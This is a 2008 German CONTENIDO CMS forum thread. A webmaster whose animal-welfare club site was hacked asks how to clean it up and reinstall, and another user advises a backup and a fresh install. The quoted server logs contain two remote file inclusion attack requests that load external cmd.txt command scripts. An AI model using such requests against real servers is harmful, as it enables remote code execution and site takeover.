CONTENIDO Forum

Das Diskussionsforum zum Open Source Content Management System
https://forum.contenido.org/

Welche Daten darf ich vor einem Upgrade löschen?

https://forum.contenido.org/viewtopic.php?f=104&t=22037

Seite 1 von 1

Welche Daten darf ich vor einem Upgrade löschen?

Verfasst: Mi 16. Jul 2008, 16:03
von Marten
Hallo Miteinander,

ich betreuer seit zig Jahren den Internet-Auftritt des Tierschutzvereins unter "tsv-neuss.de". Nun ist dieser innerhalb von 2 Tage zwei mal gehackt worden.

Mein Provider (profihost.com) hat daraufhin die Adresse gesperrt und mich in einer Mail informiert.

Gestern mit folgender Info:
Grund hierfür sind von Ihnen verwendete unsichere Skripte. Über das folgende Skript kam der Angreifer:

srv005.infobox.ru - - [15/Jul/2008:13:13:31 +0200] "GET /contenido/includes/ include.subnav.php?cfg[path][contenido]=http://www.abunaissa.de/12-cmd.txt?HTTP/
1.1" 200 408 "-" "libwww-perl/5.803

Über das Skript wurde ein externes Skript aufgerufen, so konnten Befehle auf Ihrem Speicherplatz ausgeführt werden.
Ich habe gestern daraufhin die Datei "include.subnav.php" in "...alt" umbenannt (und später gelöscht) und dann das aktuelle Contenido-Upgrade eingespielt und ausgeführt. Das hat wunderbar funktiniert.

Heute erhalte ich wieder eine Mail von profihost mit folgendem Inhalt:
Über das folgende Skript kam der Angreifer:

213.206.113.104 - - [15/Jul/2008:19:33:33 +0200] "GET /contenido/includes/include.newsletter_subnav.php?cfg[path][contenido]=http://rpgnet.com/newrpgnet/intranet/cmd.txt?
HTTP/1.1" 200 429 "-" "libwww-perl/5.805"

Über das Skript wurde ein externes Skript aufgerufen, so konnten Befehle auf Ihrem Speicherplatz ausgeführt werden.
Nun zu meinen Fragen:
Was muss ich machen, damit evt. noch weitere eingeschleuste Skripte weg sind? Oder: Welchen Inhalt des Webspaces kann / muss ich sicher löschen, um danach die aktuelle Version wieder neu einzuspielen?

Schöne Grüße vom für jede Hilfe dankbaren
Marten

Verfasst: Do 17. Jul 2008, 07:50
von thoste87
ich habe in mehreren fällen alles heruntergespeichert (um als backup zu haben) auch eine datenbanksicherung habe ich gemacht. danach habe ich alle ordner gelöscht und das neue hinaufgespielt. Dann habe ich das setup aufgerufen und die 2. option (update) ausgewählt. Hat alles geklappt - kannst du die ganzen bilder aus cms/upload/... wieder hochschpielen - die templates die du benötigts- scripte - *.css - - befindet sich alles im ordner cms. Somit solltest du keine probleme mehr haben. Bei mir klappt alles wunderbar

Verfasst: Do 17. Jul 2008, 14:36
von Marten
Hallo Thorste,

ich hatte so was gehofft und hoffe, DU hast recht!
Wenn es fertig ist, sage ich bescheid!
Vielen Dank! :D

Schöne Grüße
Marten

Verfasst: Do 17. Jul 2008, 16:21
von Marten
Hier die versprochene Rückmeldung:
Es hat auf den ersten Blick alles sauber geklappt (ich hoffe, dabei bleibt es! :) )
Noch mal vielen Dank! :-)
Alle Zeiten sind UTC+01:00
Seite 1 von 1

Powered by phpBB® Forum Software © phpBB Limited

Deutsche Übersetzung durch phpBB.de